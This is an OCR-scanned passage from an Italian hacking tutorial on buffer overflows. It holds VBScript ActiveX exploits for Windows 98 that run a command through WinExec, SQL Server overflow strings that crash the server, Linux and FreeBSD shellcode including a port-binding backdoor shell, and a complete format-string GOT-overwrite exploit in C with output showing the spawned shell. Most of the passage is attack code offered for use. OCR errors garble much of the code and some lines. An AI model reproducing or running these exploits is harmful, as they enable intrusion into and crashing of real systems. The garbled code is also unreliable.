expstr = expstr + Chr(80) 

' PUSH EDI (Indirizzo della linea di comando) 
expstr = expstr + Chr(87) 

' MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(1 86) + Chr(96) + Chr(9) + Chr(250) + Chr(1 91 ) 
' CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 
' XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
' PUSH EAX 

expstr = expstr + Chr(80) 

' MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
' CALL EDX 
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expstr = expstr + Chr(255) + Chr(210) 

' Il comando è rimpiazzabile con qualsiasi altro, 

' seguito da uno zero (inserito automaticamente dal sistema) 

expstr = expstr + "CALC.EXE" 

' lancio dell'attacco 
setupctl.DistUnit = expstr 
setupctl.InstallNow 
-></script> 

REGWIZC 

<object classid="clsid:50E5E3D1-C07E-1 1 D0-B9FD-00A0249F6B00" id="RegWizObj"> 
</object> 

<script language="VbScript" ><!--msgbox("Registration Wizard Buffer Overrun" + Chr(10) + 
"Written byShane Hird") 

expstr = 7i 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAA" 

' overflow del puntatore nello stack passato a RET 
' per ritornare alla <JMP ESP> nella Shell32. 
' Non sono permesse operazioni di tipo NULL 

expstr = expstr & Chr(235) 'Indirizzo di JMP ESP nella SHELL32 di Win98 (7FD035EB) 
expstr = expstr & Chr(53) 
expstr = expstr & Chr(208) 
expstr = expstr & Chr(127) 

' le NOP presenti facilitano il debug 
expstr = expstr + Chr(144) 

' MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

' ADD EDI, 19 (Dimensione del codice) 

expstr = expstr + Chr(1 31 ) + Chr(1 99) + Chr(25) 

' PUSH EAX (Window Style EAX = 41 41 41 41 ) 
expstr = expstr + Chr(80) 

' PUSH EDI (Indirizzo della linea di comando) 
expstr = expstr + Chr(87) 

' MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(1 86) + Chr(96) + Chr(9) + Chr(250) + Chr(1 91 ) 
' CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 
' XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
' PUSH EAX 

expstr = expstr + Chr(80) 
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' MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
' CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 

' Il comando è rimpiazzabile con qualsiasi altro, 

' seguito da uno zero (inserito automaticamente dal sistema) 

expstr = expstr + "CALC.EXE" 

' Invocazione del metodo attaccato 




Nel caso dei sistemi con su SQL Server i seguenti esempi costituiscono dei buffer overflow. 

In SQL Server 7 overflow starts at character number 6819 and If the amount 
of characters Is >= 6918 the server wlll crash: 

SELECT * FROM OpenDataSource ( ' XXXXXXXXXXX . . . ' > 6819 characters or 

more, ' ') . . .nothlng 

SELECT * FROM OPENROWSET (' XXXXXXXXXXX . . . ' > 6819 characters or 

more, '','') 

In SQL Server 2000 overflow starts at character number 6887 and if the 
amount of characters is >= 6998 the server will crash: 

SELECT * FROM OpenDataSource (' XXXXXXXXXXX . . . ' > 6887 characters or 

more, ' ') . . .nothing 

SELECT * FROM OPENROWSET (' XXXXXXXXXXX . . . ' > 6887 characters or 

more,", ") 

L'arte di scrivere delle shell 

Generalmente creare exploit remoti di daemons Unix è una cosa complessa in quanto non 
esistono molti metodi per riuscire ad individuarli. 

La scrittura inoltre dello shell code spesso e volentieri è ancora più complessa. 
Per fare un esempio vediamo un exploit legato a IMAP4. 
Questo è un exploit relativamente semplice. 

Tutto quello che si deve fare è nascondere la stringa /bin/sh" all'interno di uno shellcode 
(imapd converte tutti i caratteri in minuscolo in maiuscolo). 

Nessuna delle istruzioni in una shell generica contengono caratteri minuscoli, per cui diventa 
necessario cambiare la stringa /bin/sh 

Questo è esattakmente come una shellcode normale a parte il fatto che con u loop si 
aggiunge 0x20 ad ogni byte nella sringa "/bin/sh". 

imap . S 

. globi main 
main : 
jmp cali 
start : 

popi %sbx /* prende 1' indirizzo di /bin/sh */ 

movi %ebx, %ecx /* copia 1' indirizzo in ecx */ 

addb $0x6, %cl /* ecx ora punta all' ultimo carattere */ 

loop: 

empi %ebx, %ecx 

jl skip /* if (ecx<ebx) goto skip */ 
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decb %cl /* decrementa il puntatore */ 
jmp loop 
skip : 

/* generlc shell-spawning code */ 

movi %ebx, 0x8 (%ebx) 

xorl %eax, %eax 

movb %eax, 0x7 ( %ebx) 

movi %eax, Oxc ( %ebx) 

movb $0xb, %al 

leal 0x8 (%ebx) , %ecx 

leal Oxc (%ebx) , %edx 

int $0x80 

xorl %eax, %eax 

ine %al 

int $0x80 

cali : 

cali start 

. string " \x0f\x42 \x49\x4e \x0f\x53 \x48" 



Questa è una variante molto semplice di uno shellcode generico e può essere usato per 
mascherare dei caratteri che non sono permessi da un protocollo di un daemon. 
Il codice scritto include diverse syscalls. 
Le syscalls usate sono: 

setuid() : Per recuperare i privilegi di root (wu-ftpd) 
mkdir () /chdir () /chroot () : Per tornare alla root directory (wu-ftpd) 
dup2 () : Per connettere un tep socket alla shell ( BIND&rpc .mountd 
tep-style ) 

open () /write () : Per scrivere in /etc/passwd 
socket () : Per scrivere codice connectionless 

L'attuale numero dell syscall può essere trovato in <asm/unistd.h> 
Molte syscalls in linux x86 sono eseguite nello stesso modo. 

Il numero della syscall viene inserito dentro al registro %eax, e gli argomenti sono messi 
dentro a %ebx,%ecx e %edx rispettivamente. 

In alcuni casi ci sono più argomenti di quanti siano i registri e quindi potrebbe essere 
necessario mettere gli argomenti all'interno di una memoria utente e quindi salvare gli indirizzi 
di queste locazioni all'interno dei registri 

Se un argomento ad esempio fosse una stringa, potrebbe essere possibile mettere questa in 
memoria passare l'indirizzo di questa come argomento. 

Come nell'esempio di prima e come già detto precedentemente la syscall viene poi chiamata 
con "int $0x80". 

Ipoteticamente potreste usare qualsiasi syscall, ma quella che segue potrebbe essere l'unica 
di cui avete bisogno. 

Il seguente codice è preso da unh exploit legasto a wu-ftpd che utilizza setuid(O). 

— setuid.S— - 
. globi main 
main : 

xorl %ebx, %ebx /* mette a zero %ebx */ 

movi %ebx, %eax /* mete a zero %eax */ 

movb $0x17, %al /* setta il numero della syscall */ 

int $0x80 /* chiama 1' interrupt */ 



Port-Binding S hellcode 
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Quando state eseguendo un exploit di un daemon remoto con uno shellcode generico, 
potrebbe essere necessario avere una connessione attiva TCP per eseguire una PIPE della 
shell su stdin/out/err 

Questo è utilizzabile con tutti gli exploit remoti di Linux. 

Potrebbe però capitare che una nuova vulnerabilità venga trovata in un daemon che otre solo 
servizi UDP (SNMP per esempio). 

Potrebbe anche essere solo possibile accedere al daemon via UDP a causa delle porte TCP 
filtrate da qualche firewall. 

Al momento le vulnerabilità di Linux explottabili via UDP, sia BIND come tutti I servizi rpc 
eseguono sia UDP che TCP. 

Allo stesso modo se inviate l'exploit via UDP potrebbe essere semplice falsificare i pacchetti 
UDP attaccanti in modo tale da non apparire in nessun log. 

Per eseguire l'exploit di daemons via UDP potreste scrivere un shellcode per modificare il file 
password o per eseguire alcuni altri scopi anche se però di fatto quello di aprire una shell è il 
massimo. 

Chiaramente non è possibile adattare una pipe UDP in uno shellcode, in quanto avreste la 
necessità di avere una connessione TCP. 

Per questo è nata l'idea di scrivere una shellcode che si comporta come una backdoor, legata 
ad una porta in modo che questa venga eseguita quando è ricevuta una connessione. 
Un esempio di codice di questo tipo è : 

int main () 
{ 

char *name [2 ] ; 

int fd, fd.2, fromlen; 

struct sockaddr_in serv; 

fd=socket (AF_INET, SOCK_ S TREAM, 0) ; 

serv. sin_addr . s_addr=0 ; 

serv. sin_port=1234 ; 

serv. sin_family=AF_INET; 

bind(fd, (struct sockaddr *)&serv,16); 

listen(fd, 1) ; 

fromlen=16; /* (sizeof (struct sockaddr)*/ 

fd2=accept (fd, (struct sockaddr *) Sserv, & fromlen) ; 

/* "connect" fd2 to stdin, stdout, stderr */ 

dup2 (fd2, 0) ; 

dup2(fd2,l) ; 

dup2 (fd2, 2) ; 

name [0]= "/bin/sh "; 

name [1]=NULL; 

execve (name [0 ] , name, NULL) ; 

} 

Ovviamente questa richiede una spazo maggiore di quello richiesto da una shellcode normale 

ma in ogni caso può essere scritta in meno di 200 bytes. 

Considerate che spesso i buffers sono un pò più grandi di questo spazio. 

Esiste una complicazione aggiuntiva legata al fatto che la sycall legata al socket è un pò 

differente rispetto ale altre syscalls, sotto Linux. 

Ogni chiamata a un socket possiede lo stesso numero 0x66. 

Per differenziare le diverse socket calls, viene inserito un sottocodice dentro a %ebx. 

Questo è dentro a <linux/net.h>. 

Quello importante è : 



SYS_SOCKET 


1 




SYS_BIND 


2 




SYS_LISTEN 


4 




SYS_ACCEPT 


5 





Dobbiamo anche conoscere il valore della costante e la struttura esatta di sockaddrjn. 
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Tutto questo è nuovamente dentro al file di prima: 

AFINET == 2 
SOCKSTREAM == 1 

struct sockaddr_±n { 

short int sin_family; /* 2 byte word, containing AF_INET */ 
unsigned short int sin __port; /* 2 byte word, containg the port in 

network byte order */ 

struct in_addr sin_addr /* 4 byte long, should be zeroed */ 
unsigned char pad[8] ; /* should be zero, but doesn't really matter 

*/ 

}; 



A questo punto esistono solo due registri liberi, quindi gli argomenti devono essere inseriti 
dentro alla memoria e %ecx deve contenere l'indirizzo di questa. 
Ora dobbiamo salvare gli argomenti alla fine dello shellcode. 

I primi 12 bytes devono contenere tre argomenti long arguments, I succesivi 16 devono 
contenere la struttura sockaddrjn mentra I 4 bytes finali contengono fromlen per la cali a 
accept(). 

Alla fine i risultati di ciascuna syscall sono inseriti dentro a %eax. 



portshell . S 

. globi ma in 
main : 



/* I had to put in a "bounce" in the middle of the code as the shellcode 

* was too big. If I had made it jmp the entire shellcode, the instruction 

* would have contained a nuli byte, so if anyone has a shorter version, 

* please send me it . 
*/ 



jmp bounce 
start : 
popi %esi 

/* socket (2,1,0) */ 



xorl 


%eax, %eax 






movi 


%eax, 0x8 (%esi) 


/* 


3rd arg 


movi 


%eax, Oxc (%esi) 


/* 


zero out 


movi 


%eax, 0x10 (%esi) 


/* 


zero out 


incb 


%al 






movi 


%eax, %ebx 


/* 


socket () 


movi 


%eax, 0x4 (%esi) 


/* 


2nd arg 


incb 


%al 






movi 


%eax, (%esi) 


/* 


lst arg 


movw 


%eax, Oxc (%esi) 


/* 


sock . sin_ 


leal 


(%esi) , %ecx 


/* 


load the 


movb 


$0x66, %al 


/* 


set sock 



int $0x80 



:= 0 */ 

sock . sin_family&sock . sin __port */ 
sock . sin_addr */ 

subcode == 1 */ 

:= 1 */ 
:= 2 */ 

family == 2 */ 

address of the arguments into %ecx */ 
it syscall number */ 



/* bind(fd,& sock, 0x10) */ 



incb %bl 

movb %al, (%esi) 

movi %ecx, 0x4 (%esi) 

addb $Oxc, 0x4 (%esi) 

*/ 

movb $0x10, 0x8 (%esi) 

movb $0x23, Oxe (%esi) 

movb $0x66, %al 
int $0x80 



/* bind() subcode == 2 */ 

/* lst arg == fd (result from socket ()) */ 

/* copy address of arguments into 2nd arg */ 

/* increase it by 12 bytes to point to sockaddr struct 

/* 3rd arg == 0x10 */ 
/* set sin. port */ 

/* no need to set %ecx, it is already set */ 



/* listen(fd,2) */ 

movi %ebx, 0x4 (%esi) /* bind() subcode==2, move this to the 2nd arg */ 
incb %bl /* no need to set lst arg, it is the same as bind() */ 
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incb %bl /* llsten() subcode == 4 */ 






movb $0x66, %al /* agaln, %ecx is already set */ 






int $0x80 






/* fd2=accept (fd, Ssock, Sfromlen) * / 






t nfh &h 7 / '* a cr* (\ cmhf*nr]a ^ ic / 

Xill.'li' OJ^X / 111 l — ' — ' — £^ 1 — ( , OLÌ A — i — k_l k_J l — — — ^ ^ 






movi %ecx, 0x4 (%esi,) /* copy address of arguments into 2nd 


arg 


*/ 


addb $0xc, 0x4 (%es±) /* increase it by 12 bytes */ 






movi %ecx, 0x4 (%esi) /* copy address of arguments Into 3rd 


arg 


*/ 


addb $0xlc, 0x4 (%esl) /* Increase it by 12+16 bytes */ 






movb $0x66, %al 






int £0x80 






/* KLUDGE */ 






jmp skippy 






bounce : 






jmp cali 






skippy : 






/* dup2(fd2,0) dup2(fd2,l) dup2(fd2,2) */ 






movb %al, %bl /* move fd2 to lst arg */ 






xorl %ecx, %ecx /* 2nd arg is 0 * / 






movb $0x3 f, %al /* set dup2() syscall number */ 






int £0x80 






incb %cl /* 2nd arg is 1 */ 






movb $0x3 f, %al 






int $0x80 






incb %cl /* 2nd arg is 2 */ 






movb $0x3 f, %al 






int $0x80 






/* execve ( "/bin/sh " , [ "/bin/sh " ] , NULL) */ 






movi %esi, %ebx 






addb $0x20, %ebx /* %ebx now points to "/bin/sh" */ 






xorl %eax, %eax 






movi %ebx, 0x8 (%ebx) 






movb %al, 0x7 (%ebx) 






movi %eax, Oxc ( %ebx) 






movb $0xb, %al 






leal 0x8 (%ebx) , %ecx 






leal Oxc (%ebx) , %edx 






int $0x80 






/* exit (0) */ 






vo r* 7 2rpa y j§r(3=a v 






movi %eax, %ebx 






incb %al 






int $0x80 






cali : 






cali start 






.ascii "abcdabcdabcd " "abcdefghabcdefgh " "abcd " "/bin/sh " 













Dopo aver inviato l'exploit dovrete solo collegarvi alla porta 8960, e quindi interagire con la 
shell. 

Il seguente esempio invece è indirizzato a FreeBSD 



fbsd.S 

. globi main 
main : 
jmp cali 
start : 

/* Modlfy the ascii string so it becomes leali 7, 0 */ 
popi %esi 
xorl %ebx, %ebx 

movi %ebx, 0x1 (%esi) /* zeroed long word */ 
movb %bl, 0x6 (%esi) /* zeroed byte */ 
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movi %bs±, %ebx 




addb $0x8, %bl /* ebx points to binsh 


*/ 


jmp blah /* start the code */ 




cali : 




cali start 




sy scali : 




. ascii " \x9a \x01 \x01 \x01 \x01 \x07\x01 


" /* hidden leali 7, 0 */ 


ret 




binsh : 




. ascii "/bin/sh 




blah : 




/* put shellcode here */ 




cali syscall 





Overf low legati all'heap 

Il tipo di buffer overflow visti all'inizio di questo capitolo erano legati allo stack. 

All'interno dell' architettura Intel abbiamo un altro tipo di segmento che viene definito con il 

termine di heap che viene utilizzato per certi tipi di allocazioni fatte all'interno di un 

programma. 

Per fare una prova vedamo il file maps. 

Il file visualizza le varie porzioni di memoria associate ad un processo e le proprietà' che 
queste hanno (r/w/x): 



08048000 


-08049000 


r-xp 


00000000 


03: 


06 


148024 


/home/nail/ timer 


08049000 


-0804a000 


rw-p 


00000000 


03: 


06 


148024 


/home/nai 1 /t imer 


40000000 


-40013000 


r-xp 


00000000 


03: 


05 


5982 


/lib/ld-2.1.3.so 


40013000 


-40014000 


rw-p 


00012000 


03: 


05 


5982 


/lib/ld-2.1.3.so 


40014000 


-40015000 


rw-p 


00000000 


00: 


00 


0 




4001c000 


-400fe000 


r-xp 


00000000 


03: 


05 


5993 


/lib/libc-2 .1.3. so 


400fe000 


-40102000 


rw-p 


OOOelOOO 


03: 


05 


5993 


/lib/libc-2.1.3.so 


40102000 


-40107000 


rw-p 


00000000 


00: 


00 


0 





Struttura di un ELF. 

Quella porzione di memoria di cui parlavamo e' destinata a contenere alcune tabelle 
proprietarie del formato ELF per la rilocazione. 

Ogni programma compilato come ELF contiene soltanto il codice delle funzioni scritte da noi 
(es. il main) mentre tutte le funzioni di libreria (printf, strepy,...) rimangono in una shared 
library esterna (le libc) e vengono poi caricate in memoria soltanto quando servono. 
Questo quindi non ci permette di sapere la posizione assoluta del reale codice di una 
chiamata in una library esterna. 

La soluzione e' quindi caricare la parte di libreria esterna solo quando strettamente 
necessario e ricavare dall'header della libreria il puntatore al codice necessario. 
Il nostro codice ovviamente da qualche parte deve jumpare per chiamarle. 
Allora ecco che sono nate la GOT e la PLT. 

GOT = Global Offset Table 



Queste due tabelle fanno parte della cosiddette 'dynamic relocation entries' del nostro 
eseguibile. 

La GOT e' una tabella che può' essere visualizzata con un bel objdump -R sull'eseguibile e 
contiene una specie di mappa che collega simboli ad indirizzi e a come accedere a 
quell'indirizzo. 
Esempio: 
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. /timer: 



file format elf32-i386 



DYNAMIC RELOCATION RE CORD S 
OFFSET TYPE 
[■ ■■] 

0804976C R_386_JUMP_SL0T 
08049770 R_386_JUMP_SL0T 
08049774 R_386_JUMP_SL0T 
08049778 R_386_JUMP_SL0T 
[■ ■■] 



VALUE 
sleep 

libc_start_main 

printf 
sscanf 



Il tipo di rilocazione dipende anche da cosa stiamo rilocando, principalmente per le funzioni di 
libreria si usa soltanto l'R_386_JUMP_SLOT. 

Prendendo l'esempio: la funzione sscanf ha un'entry nella GOT all'indirizzo 0x08049778. 
Quando un programma effettua una chiamata alla scanf(), in realta' passa all'indirizzo 
associato nella jump table (il famoso offset). 
Questo permette di creare un 'wrapper' per le funzioni. 

E' possibile invece di chiamare la printf di richimare un indirizzo contenuto nella GOT. 
Questo wrapper prima di tutto caricherà' in memoria la parte di libc contenente il codice della 
printf e poi lo richiamerà'. 

Tutta la serie di procedure di wrapping e la procedura principale per caricare una determinata 
funzione e' contenuta nella PLT. 

Questo esempio penso vi chiarara' un pochino le idee (faccio riferimento alla objdumpata di 
prima): 

$ gdb . /timer 
(gdb) x 0x08049778 

0x8049778 <_GLOBAL_OFFSET_TABLE_+40> : 0x0804840a 

/* questo vuol dire che la parte di PLT per il load della sscanf 

e' all'indirizzo 0x0804840a */ 
(gdb) disass 0x0804840a 

Dump of assembler code for function sscanf: 
0x8048404 : jmp *0x8049778 

0x804840a : push $0x38 
0x804840f : jmp 0x8048384 <_init+48> 

/* presumibilimente , con push $0x38 si indica alla procedura di 
load della libreria 1 'indice della funzione desiderata o un 
suo offset, purtroppo non ho ancora trovato un modo per checkare 
la veridicità' di questa cosa. 

Ali 'indirizzo 0x8048384 dovrebbe essere contenuta la procedura di 
load 
*/ 

(gdb) disass 0x8048384 

Dump of assembler code for function _init: 
[...] 

0x8048382 <_init+46>: ret 

0x8048383 : Cannot access memory at address 0x8048383 

/* per accedere a quella parte di memoria ci vuole un piccolo trucco 

:P */ 

(gdb) disass 0x8048384 0x80483aa 

Dump of assembler code from 0x8048384 to 0x80483aa: 
0x8048384 <_init+48>: pushl 0x8049754 
0x804838a <_init+54>: jmp *0x8049758 

'* Ok, chiamiamo di nuovo qualcosa ali 'interno della GOT passandogli 



L'uso di GOT e PLT hanno solo vantaggi 

a) Sono allocate in una zona di memoria mappata sempre sia come writable che come 
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b) Hanno indirizzi _FISSI_ ottenibili senza nemmeno dover runnare il programma (objdump- 
I problemi invece sono quelli che seguono : 

a) Essendo sempre writable e executable in caso di patch come quelle di Solar Designer per 
lo stack non eseguibile possiamo tranquillamente deviare l'esecuzione del processo. 
Inoltre, abbiamo anche un posto dove scrivere lo shellcode (in realta' basterebbero 4 stupidi 
byte) 

b) Non overwritando il RET della funzione non necessita che tutta la funzione venga eseguita 
prima di saltare allo shellcode. Quindi, se ci sono controlli tipo canaries, possiamo 
tranquillamente evitarli, poiché' l'esecuzione deviera' prima. 

c) L'uso della GOT/PLT può' essere combinato perfettamente sia con altre tecniche di 
overflow. 

d) Il guess degli indirizzi praticamente sparisce, poiché' gli indirizzi sono fissi. 



Esempi pratici 

Cominciamo a fare delle prove un po' forzate... nel senso di provare a sostituire manualmente 
un qualche indirizzo di funzione. 

Se avete mai visto gli heap-based buffer overflow il funzionamento e' molto, molto simile al 
sovrascrivere un puntatore a funzione, solo che sovrascrivi l'indirizzo della funzione stessa 
Il fattore di difficolta' e' soltanto uno... 
Riassumendo un attimo lo stato della memoria: 



indirizzo più' basso: - 




OxbeOOOOOO 


circa 


1 








1 


STACK 






1 












OxcOOOOOOO 


circa 


1 








1 








1 












0x08040000 


circa 


1 








1 


TEXT AREA 






1 












0x08048000 


circa 


1 








1 


GOT/PLT/. . . 






1 












0x80490000 


circa 


1 








1 


BSS/HEAP 






1 









Come vedete, dall'heap e' impossibile raggiugnere la GOT poiché' e' prima mentre dallo stack 
siamo troppo lontani. 

Il risultato e': come ci arrivo? Bhe... questo lo vedremo nel prossimo paragrafo... modi ce ne 
sono e l'inventiva umana supera qualsiasi distanza *g* 
Per ora evitiamo questo problema e proviamo: 

<- / gotplt/boh . c I -> 

^include 

^include 
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food () 
{ 

printf ( "Sono dentro alla funzione food\n") ; 

} 

main ( ) 
{ 

long int *got = 0x11223344; 
*got = (long int) food; 
exit (0) ; 

ì 



Compiliamo con -ggdb e eseguiamo un diump del file object. 

Come in tutte le funzioni di buffer overflow lo scopo è quello di andare a sovrapporsi 
all'indirizzo di ritorno. 



$ objdump -R ./boh 




[...] 




08049550 R_386_JUMP_SLOT 


exit 







Modifichiamo la variabile: 



e lanciamo il debugger per ambiente Linux gdb. 
(gdb) break main 

Breakpoint 1 at 0x8048442 : file boh.c, line 13. 
(gdb) run 

Start ing program: / home / nail /. /boh 

warning: Unable to find dynamic linker breakpoint function. 
GDB will be unable to debug shared library initializers 
and track explicitly loaded dynamic code. 

Breakpoint 1, main () at boh.c: 13 

13 *got = (long int) food; 

(gdb) x 0x8049550 

0x8049550 <_GL0BAL_0FFSET_TABLE_+28> : 0x08048342 
(gdb) disass exit 

Dump of assembler code for function exit : 
0x4003c79c : push %ebp 




Prima di eseguire l'assegnazione gdb chiama la funzione nella PLT e solo successivamente 

disassembla il codice di exit. 

Eseguiamo ora una sostituzione d'indirizzo. 

(gdb) n 

14 exit(O); 
(gdb) disass exit 

Dump of assembler code for function exit : 
0x4003c79c : push %ebp 

0x4003c79d : mov %esp, %ebp 



Andiamo a vedere la modifica. 
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Proviamo a lanciare il programma. 



$ ./boh 

Sono dentro alla funzione food 

Quando viene chiamata la funzione exit(), il programma cerca l'entry per la rilocazione nella 
GOT, trova la locazione 0x08049560 che corrisponde alla funzione cercata, e quindi 
successivamente salta all'indirizzo contenuto in quella locazione. 

Come nell'esempio che avevamo visto all'inizio la sostituzione dell'indirizzo fa in modo chre il 

programma salti alla funzione food invece che all'entry nella PLT che gestisce la exit(). 

Per chi ha un pochino di familiarità' con gli overflow e' molto semplice sfruttare la GOT per 

fare in modo che il programma esegua iul ritorno sull'indirizzo da noi voluto. 

Mettiamo il caso che vogliamo deviare la printf, prendiamo la locazione nella GOT dove c'e' 

l'indirizzo della printf e lo overwritiamo con l'indirizzo dello shellcode. 

Solitamente l'unico problema sta nell'indirizzare il programma a scrivere lì poiché' si tratta di 
una zona di memoria precedente l'heap e che quindi non può essere raggiunta dall'heap. 
Un modo può' essere utilizzare i format bug, un altro la tecnica del doppio overflow (stack + 
heap). 

Format GOT bugs 

<-/ gotplt/fmt.c /-> 
# include 
# include 

void work(char *s) 
{ 

printf (s) ; 
exit (0) ; 

} 

int main () { 

char buf [2048] ; 

printf ("buf is located @ %p\n", buf); 
fgets (buf, sizeof (buf) , stdin) ; 
buf[strlen(buf)-l] = 0; /* strip \n */ 
work (buf) ; 

) 



Come vedete un semplice format buffer overflow non funzionerebbe. 

Fatta la printf, si modificherebbe il ret della work() che pero' non verrebbe mai raggiunto 
poiché' la exit() terminerebbe forzatamente il programma. 
L'unico modo e' sostiuire la exit con il nostro shellcode *g*. 

Per di più' abbiamo solo l'imbarazzo della scelta: possiamo usare sia la GOT stessa per 

infilare lo shellcode, oppure infilarlo in 'buf. 

Già' che abbiamo anche l'indirizzo, possiamo metterlo in buf. 

Il nostro buffer deve quindi contenere lo shellcode e andare a scrivere nella GOT l'indirizzo 
dello stesso. 

Innanzitutto prendiamoci l'indirizzo della exit: 



$ objdump -R ,/fmt 
DYNAMIC RELOCATION RECORD S 
OFFSET TYPE 
080495c4 R_386_GLOB_DAT 
08049668 R_386_COPY 
080495ac R_386_JUMP_SLOT 



VALVE 

gmon_start 

stdin 

register_frame_info 
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080495b4 R_ 


386_ 


_JUMP_ 


SLOT 


fgets 


080495b8 R_ 


386_ 


_JUMP_ 


SLOT 


libc_start_main 


080495bc R_ 


386_ 


_JUMP_ 


SLOT 


printf 



Ci sono moltissimi modi per fare la format string. 

Ho scelto quello più' classico e diffuso: scrivere i bytes in modo incrementale: 
<\xeb\x08>%$n 




ADDR e' l'indirizzo a cui dobbiamo andare a scrivere (0x08049590). 

Per chi non lo sapesse, \xeb\x08 e' un jump relativo 8 byte più' avanti. 

Questo permette di andare a prendere in uno qualsiasi dei nop e saltare i %n (a meno che 

non si sia sfigati assai e si cada direttamente sul %n. 

Utilizzando %num$x si prende il num-esimo elemento nello stack. 




Per cui diciamo che possiamo scrivere Oxbffff 1 e2 tranquillamente. 
Ora cerchiamo la format string all'interno dello stack: 

$ ./fiat 

buf is locateci @ 0xbffffld8 

AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%pAAAA0x400137500xbffff9d80x80484c20xb 
ffff7d80x2000xbffff9d80x80484ce0xbffff7d80xbffff7d80x400131540x400002300x401 
009b40xbffffal40x2 (nil) 0x400013100x2c80x41414141 



Per cui distanza = 18. 

A questo punto abbiamo tutti i dati per costruire il nostro exploit. 

<-/ gotplt/got . c /-> 

iinclude 

iinclude 

iinclude 

char linuxsc[] = /* just alephl's old shellcode (linux x86) */ 

"\xeb\xlf\x5e\x89\x76\x08\x31 \xc0\x88\x46\x07\x89\x46\x0c\xb0 
" \xOb \x89 \xf3 \x8d\x4e \x08 \x8d\x56\x0c\xcd\x80 \x31 \xdb \x89 \xd8 
"\x40\ xcd \x80\xe8\ xdc \ xff \ xff \ xff/bin/sh " ; 

int numfint n) 
{ 

if(n < 10) return 1; 
if(n < 100) return 2; 
if(n < 1000) return 3; 

} 

int 

main (int argc, char **argv) 
{ 

char a[256] ,b[256] ,c[256] ,d[400] , buf [1024]; 
long int what, where; 

int whatO, whatl, what2, what3, dist; 

bzero (a, sizeof (a) ) ; 
bzero (b, sizeof (b) ) ; 
bzero (c, sizeof (c)); 
bzero (d, sizeof (d) ) ; 
bzero (buf, sizeof (buf) ) ; 

if (argc != 4) 
{ 
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prlntf ("Usage: %s \n" , argv [0] ) ; 
exit (0) ; 

} 

/* recuperiamo i nostri indirizzi */ 

/* what e' cosa va scritto, where dove : ) */ 

sscanf (argv[l] , "%lx", iwhat) ; 

sscanf (argv [2] , "%lx", & where) ; 

dist = atoi (argv [3] ) ; 

/* dividiamo 1 'indirizzo */ 
whatO = (what & Oxff); 
whatl = (what » 8) & Oxff; 
what2 = (what » 16) S Oxff; 
what3 = (what » 24) & Oxff; 

/* riempiamo un buffer per ogni byte da scrivere */ 
memset(a, ' \x90 ' ,whatO - 2 - 16); 
sprint f (a+strlen (a) , "\xeb\x08%%%d$n" , dist); 
memset(b, ' \x90 ', whatl - whatO - 2); 
sprint f (b+strlen (b) , "\xeb\x08%%%d$n" , dist+1) ; 
memset(c, ' \x90 ' ,what2 - whatl - 2); 
sprint f (c+strlen (c) , "\xeb\x08%%%d$n" , dist+2) ; 
memset(d, ' \x90 ', 0x100 + what3 - what2 - 2); 
sprint f (d+strlen (d) , "\xeb%c%%%d$n" , num(dist)+3, dist+3) ; 
/* questo e' difficile :) il salto dev'essere preciso 
in modo da beccare in pieno lo shellcode. 
si poteva anche semplicemente mettere ancora qualche NOP 
ma odio le cose semplici :P */ 

/* inseriamo i 4 indirizzi */ 
* (long int *)buf = where; 

* (long int *) (buf+4) = where+1; 
* (long int *) (buf+8) = where+2; 
* (long int *) (buf+12)= where+3; 
/* tutto il resto e lo shellcode */ 
sprint f(buf +16, "%s%s%s%s%s" , 
a, b, c, d, linuxsc) ; 



/* printiamo */ 
printf("%s\n", buf); 
return 0; 




$ (./got 0xbffff223 0x080495c0 18 ; cat - ) \ ./fmt 

buf is located @ 0xbffffld8 

id 

uid=1000 (nail) g±d=100 (users) groups=100 (users) , 3 (sys) 

Risultato: la exit() e' diventata il nostro shellcode 



Questo e' un metodo un po' particolare... anzi penso che più' che un metodo sia un trucchetto 
molto carino. 

Infatti per essere attuato richiede ben precise condizioni. 

In poche parole, si tratta di overwritare un puntatore nello stack in modo che una successiva 

lettura porti a scrivere nella GOT. 

Esempio: 

char *msg; 
char buf [256] ; 
[. ■■] 

msg = malloc (2048) ; 
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strcpy (buf, argv[l ] ) ; 
fgets (msg, 2048, stdln) ; 

Con la strcpy possiamo sovrascrivere l'indirizzo di msg con quello che ci serve (l'indirizzo a 

cui dovremmo scrivere all'interno della GOT). 

Con la fgets poi inseriremo nella GOT tutto quello che ci serve. 

Ovviamente perche' tutto ciò' accada bisogna che: 

a) il puntatore sia raggiungibile nello stack dal primo buffer; 

b) il puntatore non venga modificato tra lo stack overflow e la scrittura 
ali 'interno della GOT (se la malloc fosse stata dopo la strcpy sarebbe 
stato impossibile) ; 

c) il puntatore sia ovviamente a nostra disposizione per inserire dati. 



Qui sotto potete trovare un programma abbastanza semplice su cui fare esercizio. 

<-/ gotplt/proggie . c /-> 
/* ovviamente: 

# gcc -o proggie proggie.c -lcrypt 

# chown root . /proggie 

# chmod 4 755 . /proggie 
i su - user 

$ vi exploit . c 

*/ 

iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 

char * 

